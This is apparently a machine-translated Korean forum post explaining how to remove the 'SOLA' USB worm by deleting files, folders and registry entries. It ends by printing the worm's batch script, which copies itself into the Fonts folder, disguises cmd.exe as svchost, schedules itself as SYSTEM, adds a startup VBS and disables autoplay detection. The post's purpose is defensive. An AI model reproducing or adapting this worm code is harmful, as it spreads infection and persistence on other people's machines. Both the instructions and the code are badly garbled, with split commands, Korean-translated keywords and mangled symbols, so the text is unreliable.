해결 방법 2:
첫째, 안전 모드 입력
1. 리소스 매니저를 사용하여 각 문자 디렉토리로 이동한 다음 숨겨진' SOLA' 폴더와' Autorun.inf' 파일
을 삭제합니다그런 다음 360 웹 사이트에 가서' USB 바이러스 특살도구' 를 다운받아 죽이면 팝업 창' 예 ...' 를 클릭하고' XXX 를 만드시겠습니까?'
생성을 클릭하면 소프트웨어는 각 문자 아래에' Autorun.inf' 라는 가짜 바이러스 파일을 만들어 바이러스가 파일을 다시 만들지 못하도록 합니다.
2.' 파일 또는 폴더 검색' 키워드' sola' 의 모든 파일과 폴더, sola 라는 이름의 모든 파일과 폴더를 삭제합니다.
3. 다음 파일을 수동으로 찾아 삭제할 수 있습니다.
Systemroot \ \ fonts \ \ regedit.reg
Systemroot \ \ fonts \ \ sleep.exe
Systemroot\\Fonts\\SOLA.BAT
Systemroot \ \ fonts \ \ est _ type2032.fon
Systemroot \ \ tasks \ \ tasks.job
Systemroot \ \ fonts \ \ sola setup
Systemroot \ \ tasks \ \ tasks.job
4. 생성 시간별로 정렬하여 동시에 생성된 모든 파일을 삭제합니다.
5. 레지스트리 열기 (시작-실행 클릭, "regedit" 입력, 캐리지 리턴)
6. 레지스트리 왼쪽 디렉터리 맨 위에 있는' 내 컴퓨터' 를 마우스로 클릭하고' 편집-찾기' 를 클릭한 다음' SOLA' 를 입력하여 모든 관련' 항목',' 값',' 데이터'
를 삭제합니다참고: 일부 소프트웨어는 이름에 "SOLA" 가 있지만 바이러스가 아니므로 구분해야 합니다. (다음 그림에 표시된 바와 같이 바이러스 항목이 아님) 바이러스의 "항목" "값" "데이터" 는 일반적으로 한눈에 볼 수 있습니다.
[attach]27266[/attach]
----------
7. 트로이 목마는 전원을 켠 후 자동으로 실행할 수 있도록 레지스트리의 다음 옵션에 레지스트리 항목을 추가하는 경우가 많습니다.
Hkey _ local _ machine \ software \ Microsoft \ windows \ currentversion \ run
Hkey _ local _ machine \ software \ Microsoft \ windows \ currentversion \ runonce
Hkey _ local _ machine \ software \ Microsoft \ windows \ currentversion \ runonceex
Hkey _ local _ machine \ software \ Microsoft \ windows \ currentversion \ runservices
Hkey _ local _ machine \ software \ Microsoft \ windows \ currentversion \ runservicesonce
알 수 없는 항목을 삭제합니다. (360 보안 경비원도 부팅 항목을 볼 수 있음)
C: \ \ documents and settings \ \ all users \ \ 시작 메뉴 \ \ 프로그램 \ \ 시작 에 SOLA.vbs 문서 <
(참고: 이 파일의 샘플을 저장하는 것을 잊었기 때문에 기억이 잘 안 납니다.)
8. 마지막으로 모든 문자를 다시 확인하여' SOLA' 폴더가 깨끗하게 제거되었는지 확인합니다. 다시 한 번 삭제해야 할 것이 있다면' Autorun.inf' 파일을 삭제할 필요가 없습니다. 그것은 바이러스를 속이기 위해 만든 전용 도구입니다.
9. USB 디스크, MP3 등 모든 USB 인터페이스 하드웨어에서' SOLA' 폴더를 삭제합니다. 물론 휴대전화 메모리 카드 리더로도 낙찰됩니다.
10. 컴퓨터를 다시 시작하고 끝내세요.
다음은' sola.bat' 의 내용을 동봉합니다.
@echo off
Set sola=systemroot\\Fonts
Set setup = systemroot \ \ fonts \ \ sola setup
If not \ "1 \" = = \ "-USB \" goto start
시작/최대 ..
If exist sola \ \ sola.bat goto end
:: = = = = = = = = = = = = = = = = = = = = = = = = = = infect = = = = = = = = = = = = = = = =
: Infect
Cd\\
Md systemroot ₩₩ fonts ₩₩ sola setup
::---파일 복제-----
Copysola \ \ autorun.inf setup \ \ autorun.inf
Copysola \ \ sola.batsetup \ \ sola.bat
Copy sola\\ 오타쿠 들어오세요. RAR setup\\ 오타쿠 들어오세요. RAR
Copysola \ \ tasks.xxxsetup \ \ tasks.xxx
Copysola \ \ sleep.exesetup \ \ sleep.exe
Tasklist gt;; Sola\\task.txt
For/f \ "tokens = 1 \" I in (\' findstr/I \ "svchost.exe \" \ "sola \ \ task)
Copy systemroot \ \ system32 \ \ cmd.exesola \ \ svchost
Del sola\\task.txt
: Tasks
Copysetup \ \ tasks.xxxsystemroot \ \ tasks \ \ tasks.job
Schtasks/change/ru \ "nt authority \ \ system \"/TN \ "tasks \" if error level 1 goto task fail "
Goto TaskSuc
: TaskFail
홈 드라이브
Cd \ "모든 사용자 프로필 \"
Cd 시작 메뉴 \ \ 프로그램 \ \ 시작
Echo On Error Resume Nextgt;; SOLA.VBS
Echo set ws = wscript.createobject (\ "wscript.shell \") gt; Gt; SOLA.VBS
Echows.run \ "sola \ \ svchost.exe/csol
A\\SOLA.BAT\ ",0gt; Gt; SOLA.VBS
Copy SOLA.VBS sola\\SOLA.VBS
Echo NTgt;; Systemroot\\Fonts\\NoTasks
: TaskSuc
Attribsystemroot \ \ tasks \ \ tasks.job+s+h+r
Copysetup \ \ sola.batsola \ \ sola.bat
Copysetup \ \ sleep.exe systemroot \ \ system32 \ \ sleep.exe
: NoAutoPlay
Netstop \ "shell hardware detection \"
Echo windows 레지스트리 편집기 버전 5.00 gt : Systemroot \ \ fonts \ \ regedit.reg
Echo [HKEY _ local _ machine \ \ system \ \ currentcontrolset \ \ services \ \ shellhwdetection] Gt; Systemroot \ \ fonts \ \ regedit.reg
Echo \ "start \" = dword: 00000004 gt; Gt; Systemroot \ \ fonts \ \ regedit.reg
Startregedit/s systemroot \ \ fonts \ \ regedit.reg
: KillTMG
Goto End
:: = = = = = = = = = = = = = = = = = = = = = = = infect = = = = = = = = = = = = = = = = = = = =
:: = = = = = = = = = = = = = = = = = = = = = start = = = = = = = = = = = = = = = = = =
: 시작
홈 드라이브
Cd \ "모든 사용자 프로필 \"
Cd 시작 메뉴 \ \ 프로그램 \ \ 시작
Date /t gt;; Sola\\est_type2032.fon
Findstr/c: \ "-10-01 \" \ "sola \ \ est _ type2032.fon \" if not error level 1 goto dayon
If exist systemroot \ \ fonts \ \ notasks if not exist sola.vbs copy sola \ \ sola.vbs sola.vbs
: Continue
Sleep 300set C=0 amp;; 에코 1gt; C: \ \ solachk1amp; Findstr.c: \ \ solachk1amp; If not errorlevel 1 del C:
\ \ solachk1amp; Sleep 1000amp;; Set C=1 amp;; Findstr/c: \ "sola _ 1.0 \" c: \ \ autorun.inf amp; If error level 1 attrib-s-h-r c: \ \ autorun.inf